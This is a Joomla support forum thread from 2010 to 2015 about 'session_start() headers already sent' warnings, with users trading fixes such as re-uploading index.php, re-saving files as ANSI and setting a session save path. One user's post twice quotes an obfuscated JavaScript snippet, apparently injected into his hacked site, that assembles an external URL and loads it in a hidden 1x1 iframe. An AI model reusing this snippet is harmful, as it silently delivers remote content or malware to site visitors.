Warning: session_start() [function.session-start]:

Joomla version 1.5 is end-of-life and are no longer supported. Please use Joomla 3.x instead.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
nuwud
Joomla! Intern
Joomla! Intern

Re: Warning: session_start() [function.session-start]:

Post by nuwud » Tue Oct 26, 2010 3:10 am

For me it was dropping an SEO plugin from my jos_plugins db.

I tried everything else, too and nothing had worked until I dropped that table.
Thanks,

Nuwud Order

grashoper
Joomla! Intern
Joomla! Intern

Post by grashoper » Tue Jan 04, 2011 2:52 pm

the saving conf.php as a ANSI type worked for me!! thanks!

bossman42
Joomla! Explorer
Joomla! Explorer

Post by bossman42 » Fri Jan 21, 2011 8:47 pm

index.php did it for me. One extra line at the bottom of the code. I look like a freakin genius to my client. hehehe

Thanks for keeping this thread going!

thomasoo
Joomla! Fledgling
Joomla! Fledgling

Post by thomasoo » Sun Aug 14, 2011 7:18 am

I have tried just about everything and continue to have the same problem. I have no idea what to do.

mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/27/d99930111/htdocs/cabanas/administrator/index.php:1) in /homepages/27/d99930111/htdocs/cabanas/libraries/joomla/session/session.php on line 462

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/27/d99930111/htdocs/cabanas/administrator/index.php:1) in /homepages/27/d99930111/htdocs/cabanas/libraries/joomla/session/session.php on line 462
mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);

dpacadmin
Joomla! Champion
Joomla! Champion

Post by dpacadmin » Sun Aug 14, 2011 2:12 pm

Try disabling plugins and modules that display on your home page, one at a time, and test to see if one of them is the issue.

thomasoo
Joomla! Fledgling
Joomla! Fledgling

Post by thomasoo » Sun Aug 14, 2011 2:20 pm

I would if I could login to the administrator :(

dpacadmin
Joomla! Champion
Joomla! Champion

Post by dpacadmin » Sun Aug 14, 2011 2:49 pm

Have you tried uploading a new copy of the
administrator/index.php
file?
Use a FTP program like FileZilla to upload the file, using a program like Dreamweaver to upload can cause problems.

joelogic
Joomla! Fledgling
Joomla! Fledgling

Post by joelogic » Tue Apr 15, 2014 8:29 am

Hello

I know this is quite an old thread, but I had the same problem on a client's site, which turned out to have been hacked. The hackers had overwritten some files in the 'includes' directory, and also in the 'modules' directory, and had added some files in the root. Also, the index.php file in the root had been deleted.

The hack was not obvious, and hadn't damaged or changed the way the site worked, so all the normal fixes didn't do anything. Some of the hackers' files had base64 encoding, of course, but I haven't fully checked out what they were up to. They were Indonesia hackers, (or maybe just some script-kiddies) and I blocked all Indonesian IP's via htaccess. Time to upgrade Joomla (1.52) it seems.

dorsa
Joomla! Apprentice
Joomla! Apprentice

Post by dorsa » Wed Apr 16, 2014 2:16 am

thomasoo wrote:I would if I could login to the administrator :(
The problem of your index.php file, as the error message states. However, all current Joomla! versions have comments of their index.php, so it is most likely not the original file. It is impossible to get closer to it without source code.

dima91n
Joomla! Fledgling
Joomla! Fledgling

Post by dima91n » Thu Aug 14, 2014 7:15 am

Its a permission error. Contact your hosting telling them the errors you get with session.php
Godd luck!

3d web design
Joomla! Apprentice
Joomla! Apprentice

Post by 3d web design » Tue Dec 08, 2015 1:55 pm

dima91n wrote:Its a permission error. Contact your hosting telling them the errors you get with session.php
Godd luck!
Its not every time a permission error. And is better (and faster) to fix error yourself.

I got the same error about session start in /public_html/libraries/joomla/session/session.php --- so, we can't install latest Joomla 3 on tsohost cloud host. This happened also on other hosts, so I will post here solution to help all these people with problems like my.

How we solved this? Quick solution (about 30 seconds, one edited php file):

1. Open /public_html/libraries/joomla/session/session.php
- about line 658 in latest Joomla 3.4 you will find:

Code: Select all

session_start();
Add before this line:

session_save_path("/tmp");
to look like this:

session_save_path("/tmp");
session_start();